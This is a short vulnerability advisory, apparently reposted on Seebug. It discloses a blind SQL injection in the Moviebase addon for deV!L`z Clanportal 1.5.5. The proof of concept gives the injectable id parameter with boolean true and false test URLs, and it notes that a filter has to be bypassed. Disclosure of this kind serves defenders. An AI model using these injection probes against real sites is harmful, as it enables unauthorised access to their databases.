======================================================================================== | # Title : deV!L`z Clanportal 1.5.5 Moviebase Addon Blind SQL Injection Vulnerability | # Author : Easy Laster | # Download : http://www.modsbar.de/Addons/79/moviebase/ | # Script : deV!L`z Clanportal 1.5.5 Moviebase | # Price : 20? | # Bug : Blind SQL Injection | # Date : 12.01.2012 | # Language : PHP | # Status : vulnerable/Non-Public | # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah ====================== Proof of Concept ================================= [+] Vulnerability movies/index.php?action=showkat&id= [+] Injectable #true http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=1--+ #false http://[host]/[path]/movies/index.php?action=showkat&id=1+and+1=2--+ [-] The SQL Injection Filter Function must be bypassed ()
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论